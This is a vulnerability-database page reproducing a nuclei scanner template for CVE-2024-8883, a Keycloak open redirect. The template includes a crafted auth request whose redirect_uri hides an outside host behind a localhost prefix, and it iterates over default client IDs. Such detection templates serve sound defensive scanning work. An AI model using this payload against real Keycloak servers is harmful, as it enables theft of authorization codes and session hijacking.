Lucene search
K

Keycloak - Open Redirect

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 73 Views

Keycloak misconfiguration allows open redirect leading to sensitive information exposur

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2024-8883
19 Sep 202416:15
attackerkb
Chainguard
CVE-2024-8883 vulnerabilities
19 Sep 202416:15
cgr
Circl
CVE-2024-8883
19 Sep 202418:40
circl
CNNVD
Red Hat Keycloak 输入验证错误漏洞
19 Sep 202400:00
cnnvd
CVE
CVE-2024-8883
19 Sep 202415:48
cve
Cvelist
CVE-2024-8883 Keycloak: vulnerable redirect uri validation results in open redirec
19 Sep 202415:48
cvelist
EUVD
EUVD-2024-3152
3 Oct 202520:07
euvd
Github Security Blog
Duplicate Advisory: Keycloak Open Redirect vulnerability
19 Sep 202418:30
github
Github Security Blog
Keycloak has Vulnerable Redirect URI Validation Results in Open Redirect
14 Oct 202420:55
github
NVD
CVE-2024-8883
19 Sep 202416:15
nvd
Rows per page
id: CVE-2024-8883

info:
  name: Keycloak - Open Redirect
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.
  impact: |
    Attackers can redirect users to malicious URLs and capture sensitive information such as authorization codes and session tokens, potentially leading to session hijacking and account compromise.
  remediation: |
    Update Keycloak configuration to avoid using localhost or 127.0.0.1 as Valid Redirect URIs, and apply security patches addressing the open redirect vulnerability.
  reference:
    - https://github.com/advisories/GHSA-vvf8-2h68-9475
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
    cvss-score: 6.8
    cve-id: CVE-2024-8883
    cwe-id: CWE-601
    epss-score: 0.01959
    epss-percentile: 0.77881
  metadata:
    max-request: 1
    verified: true
    shodan-query: title:"keycloak"
  tags: cve,cve2024,keycloak,redirect,vuln,vkev

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      redir_host:
        - http://localhost
        - http://127.0.0.1
        - https://localhost
        - https://127.0.0.1
        - http://[::]
        - https://[::]

      client_id:
        - security-admin-console
        - master-realm
        - broker
        - admin-cli
        - account
        - account-console

    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - 'Location:\s+https?://(localhost|127.0.0.1|\[::\]):\d*@oast\.me\?'

      - type: status
        status:
          - 302
# digest: 4a0a00473045022000c8a4de21e3c3f5d68884e517dff9ed3689849896973dd4de8d05e96c078d4802210097eb6e0df7b48a01c1df216f5d1c8b59d6c0099241c05f5a3dde0f6903bbd733:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.1
EPSS0.01959
SSVC
73